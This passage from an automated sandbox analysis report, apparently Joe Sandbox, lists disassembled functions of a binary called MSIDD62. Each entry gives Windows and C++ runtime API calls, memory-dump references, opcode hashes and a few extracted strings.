                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      • Opcode ID: f5415ab0a0e0c11ec1f2c5d0126e9a596260b9d2ecb14978b14b51226f579987
                                                                      • Instruction ID: 3720ce3e064637d389c24ee127cc000abd09f3461879a371687ed6c0a18e62e0
                                                                      • Opcode Fuzzy Hash: f5415ab0a0e0c11ec1f2c5d0126e9a596260b9d2ecb14978b14b51226f579987
                                                                      • Instruction Fuzzy Hash: 1B01C07590462D8BCF06EB68D906ABFB7A1AF84310F25051DE610BB3D2CF749E028B95
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7C24
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7C2E
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7C68
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7C7F
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C9F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 81cb58268ae0204fe4283342153d1505f826b97950ab19b381d8015793fcc727
                                                                      • Instruction ID: 425c9e57f3aadd39ff8271f0fa5606d146d7ccce9a5cea28ff5c921b7a1d2e61
                                                                      • Opcode Fuzzy Hash: 81cb58268ae0204fe4283342153d1505f826b97950ab19b381d8015793fcc727
                                                                      • Instruction Fuzzy Hash: EC01D23590462D8BCF12EB64D9467BEBBB1AFC4310F25051AE610AF3D2CF389E058B84
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7CB9
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7CC3
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7CFD
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7D14
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7D34
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 6654f5ff33b2cc1c66cd28e74ca971dbe4c158719ed1ea63134762ae82636d06
                                                                      • Instruction ID: ae7269468eb67fdf95dd2f8aa2151240f01236971af119f2814f670884f5d928
                                                                      • Opcode Fuzzy Hash: 6654f5ff33b2cc1c66cd28e74ca971dbe4c158719ed1ea63134762ae82636d06
                                                                      • Instruction Fuzzy Hash: A801C47590461D9BCF02EB64D9457BEB765AF84310F240529FA116F2D2DF349E0187D4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7D4E
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7D58
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7D92
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7DA9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7DC9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 5436265d0df3e1598deba04aaa18a9a467be8293a798e0e24c96486e83438230
                                                                      • Instruction ID: 5b3777991f0fb3cbc2734d4dbb94a1911644f10972498aaab243d8f47d496f2e
                                                                      • Opcode Fuzzy Hash: 5436265d0df3e1598deba04aaa18a9a467be8293a798e0e24c96486e83438230
                                                                      • Instruction Fuzzy Hash: 7201C07590062D8BCB03EB64C946ABEB7A2AF95310F65011AF610AB3D2DF349E019BC4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7DE3
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7DED
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 003F7E27
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7E3E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7E5E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      • Opcode ID: 6bba569cf388c4f230e6c179ba25911fbe0372a380a43e598a69767bfcd4e992
                                                                      • Instruction ID: f21794fc6ab50cbc2f48f76b92f58715b99ea45e9f886d864ada5c99cc71a934
                                                                      • Opcode Fuzzy Hash: 6bba569cf388c4f230e6c179ba25911fbe0372a380a43e598a69767bfcd4e992
                                                                      • Instruction Fuzzy Hash: 7E01227190462D9BCF12EB64D8017BEB7A1BF94310F24055AE611AF3D2CF349E01CB84
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
                                                                      • LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
                                                                      • RtlWakeAllConditionVariable.NTDLL ref: 004078DF
                                                                      • SetEvent.KERNEL32(?,003E2627,0044571C,0042CCC0), ref: 004078E9
                                                                      • ResetEvent.KERNEL32(?,003E2627,0044571C,0042CCC0), ref: 004078F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                      • String ID:
                                                                      • API String ID: 3916383385-0
                                                                      • Opcode ID: 9a97a536bf8f0ed328943627a682e613db1dc22bfbf69e451ca5562aa57b806b
                                                                      • Instruction ID: ace09a6154836d104b93435ac20adedb3fd67d0dc8275bad8cbdf05cd55617a6
                                                                      • Opcode Fuzzy Hash: 9a97a536bf8f0ed328943627a682e613db1dc22bfbf69e451ca5562aa57b806b
                                                                      • Instruction Fuzzy Hash: A0016D35A05620DFC714AF18FC09A943B64FB4A702B01407AE80293330CBB56D02DBAC
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 003F3C35
                                                                        • Part of subcall function 003F2823: __EH_prolog3.LIBCMT ref: 003F282A
                                                                        • Part of subcall function 003F2823: std::_Lockit::_Lockit.LIBCPMT ref: 003F2834
                                                                        • Part of subcall function 003F2823: std::_Lockit::~_Lockit.LIBCPMT ref: 003F28A5
                                                                        • Part of subcall function 003EA2B0: LocalAlloc.KERNEL32(00000040,80000023,00000000,?,?,?,?,003F3F08,00000001,?,00000000,?,?,00000001,?,?), ref: 003EA2F3
                                                                        • Part of subcall function 003EA2B0: LocalFree.KERNEL32(7FFFFFFF,?,?), ref: 003EA399
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: LocalLockitstd::_$AllocFreeH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx$=J?$hcK?
                                                                      • API String ID: 1009823702-1633469552
                                                                      • Opcode ID: b9e505ccea7ec69aa13765c49726169fb135fa52751c1661336a8f3aa4dc8cda
                                                                      • Instruction ID: 17d14f7a445cca4e4e74bdd4238c9e0bda5362e2d2b1dc0c60dcfaa832255804
                                                                      • Opcode Fuzzy Hash: b9e505ccea7ec69aa13765c49726169fb135fa52751c1661336a8f3aa4dc8cda
                                                                      • Instruction Fuzzy Hash: 04D18A31E0438C9ADF17DFA8C5806FDBBB2AF55300F294099EA956F296CB709E45CB50
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 003E60F4
                                                                      • GetLastError.KERNEL32 ref: 003E6190
                                                                        • Part of subcall function 003E1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,0042938D,000000FF,?,80070057,?,?,00000000,00000010,003E1B09,?), ref: 003E2040
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,0043B2DC,00000001,00000000), ref: 003E614E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 4113295189-2227199552
                                                                      • Opcode ID: 9cd523298d8ab5a5a506a937b5acb5a2eba1745b1c3ab960dd67348a2e8c881b
                                                                      • Instruction ID: 3877937bf283f72f015573526fc53c72ea7e3dd60c3574c54d44be8eff859e96
                                                                      • Opcode Fuzzy Hash: 9cd523298d8ab5a5a506a937b5acb5a2eba1745b1c3ab960dd67348a2e8c881b
                                                                      • Instruction Fuzzy Hash: C031F071A006549BD721DF69CC45BAEB7F8FF58710F108A2EE425D72C1EBB4A904CB94
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003FD2C9
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7019
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7036
                                                                        • Part of subcall function 003F6FF9: _Maklocstr.LIBCPMT ref: 003F7053
                                                                        • Part of subcall function 003F6FF9: _Maklocchr.LIBCPMT ref: 003F7065
                                                                        • Part of subcall function 003F6FF9: _Maklocchr.LIBCPMT ref: 003F7078
                                                                      • _Mpunct.LIBCPMT ref: 003FD356
                                                                      • _Mpunct.LIBCPMT ref: 003FD370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2939335142-1686923651
                                                                      • Opcode ID: ba964b4ab092324af21b29b1c445b6c09568593dda4532d8621a89e038e8d82e
                                                                      • Instruction ID: e53d973901611999a82b6713142029720565711c3196151217e6a94fb052e47e
                                                                      • Opcode Fuzzy Hash: ba964b4ab092324af21b29b1c445b6c09568593dda4532d8621a89e038e8d82e
                                                                      • Instruction Fuzzy Hash: 4921B2B5904B966FD722DF75849473BBEF8AB09300B044A5EE199C7A42D734E601CB90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 4281374311-1686923651
                                                                      • Opcode ID: 968e5194792cd737fa19dbc0bf9eb7784e9daf314f4abe7c877b6bc853c587b9
                                                                      • Instruction ID: 217c18a2671041a185f39ae9d9068373126cdbd2681d4337b0d2d99eef985532
                                                                      • Opcode Fuzzy Hash: 968e5194792cd737fa19dbc0bf9eb7784e9daf314f4abe7c877b6bc853c587b9
                                                                      • Instruction Fuzzy Hash: 8F21A3B1904A966ED721DF75C49073B7EE8AB49300F04492EE559C7A42D738E601CBD4
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040BFC3,00000000,?,00444EA4,?,?,?,0040C166,00000004,InitializeCriticalSectionEx,0042F92C,InitializeCriticalSectionEx), ref: 0040C01F
                                                                      • GetLastError.KERNEL32(?,0040BFC3,00000000,?,00444EA4,?,?,?,0040C166,00000004,InitializeCriticalSectionEx,0042F92C,InitializeCriticalSectionEx,00000000,?,0040BF1D), ref: 0040C029
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040C051
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3177248105-2084034818
                                                                      • Opcode ID: ee13e47115789ce18a88ffa0661c1712838bec352f1c49f3b544d6f0ba214ac6
                                                                      • Instruction ID: 48a6971b1fa9051aaaf7cc350eb90e4c524cead853fe8669ff49303be18f4f3b
                                                                      • Opcode Fuzzy Hash: ee13e47115789ce18a88ffa0661c1712838bec352f1c49f3b544d6f0ba214ac6
                                                                      • Instruction Fuzzy Hash: 07E09A70784208F7EF202BA1EC46B5A3B699B01B55F644032FA0CE85E1D7B5A996D6CC
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal_strcspn
                                                                      • String ID:
                                                                      • API String ID: 2585785616-0
                                                                      • Opcode ID: c716aad913d32bc06e896f21dee379d18c19bd7d994480a448cb7ebe0f5ec836
                                                                      • Instruction ID: 8a5e0fb3b9b0b18a11d31dac639e835ea2b027f538d407dc9274fcfafe668b37
                                                                      • Opcode Fuzzy Hash: c716aad913d32bc06e896f21dee379d18c19bd7d994480a448cb7ebe0f5ec836
                                                                      • Instruction Fuzzy Hash: A5F17975A00299DFDF15CFA9C884AEEBBF5FF48304F144269E815AB291D731EA41CB90
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(755CD0F6,?,00000000,?), ref: 004273EE
                                                                        • Part of subcall function 0042002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0041C527,?,00000000,-00000008), ref: 004200D7
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00427649
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00427691
                                                                      • GetLastError.KERNEL32 ref: 00427734
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: e862e4df0c57509bfea2ce18d490f08c34c0c5b4cf55a189d7656870ba15f5d2
                                                                      • Instruction ID: dba99a240e0573707dd40e57b04429e8a8d3d3e52e0cf91264bf21a56f19f919
                                                                      • Opcode Fuzzy Hash: e862e4df0c57509bfea2ce18d490f08c34c0c5b4cf55a189d7656870ba15f5d2
                                                                      • Instruction Fuzzy Hash: BED189B5E046589FCF01CFA8E8809AEFBB4FF49314F58412AE855E7351D734A842CB58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 3e0969e25d7f161e5926dc9b4b6f31079b69bfedf404d7e31f53c1ec4cb4e257
                                                                      • Instruction ID: d50fef7b2d29abfcb501de0699da7cc5b3d7c4d791c44556870eb19091ddd41c
                                                                      • Opcode Fuzzy Hash: 3e0969e25d7f161e5926dc9b4b6f31079b69bfedf404d7e31f53c1ec4cb4e257
                                                                      • Instruction Fuzzy Hash: C5C17A7191024D9FDF1ADF94C9849FEBBB9FF48300F15402AEA05AB251DB34AE45CBA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 08a8aa20114192f4c59bcbf0cb303d723656a1b8effd7fb79d6ec0d1d0ab15de
                                                                      • Instruction ID: 533dca0e35361cbfeea3bb8865cdb71f0433468182ba3be4ffad4abe51068922
                                                                      • Opcode Fuzzy Hash: 08a8aa20114192f4c59bcbf0cb303d723656a1b8effd7fb79d6ec0d1d0ab15de
                                                                      • Instruction Fuzzy Hash: 74C16A7190024DDFDF16DFA8C980AFEBBB9EF08310F14451AEA15AB251D734AE45CBA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003ECA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003ECA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003ECB4F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_$Locinfo_ctorLocinfo_dtorLockitLockit::_
                                                                      • String ID:
                                                                      • API String ID: 2022693140-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000000,76B15490,003E8B3A,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E9027
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                      • API String ID: 1452528299-1781106413
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F440A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                      • String ID:
                                                                      • API String ID: 4244582100-0
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,755CD0F6), ref: 003F143C
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F145C
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F148D
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F14A6
                                                                      Memory Dump Source
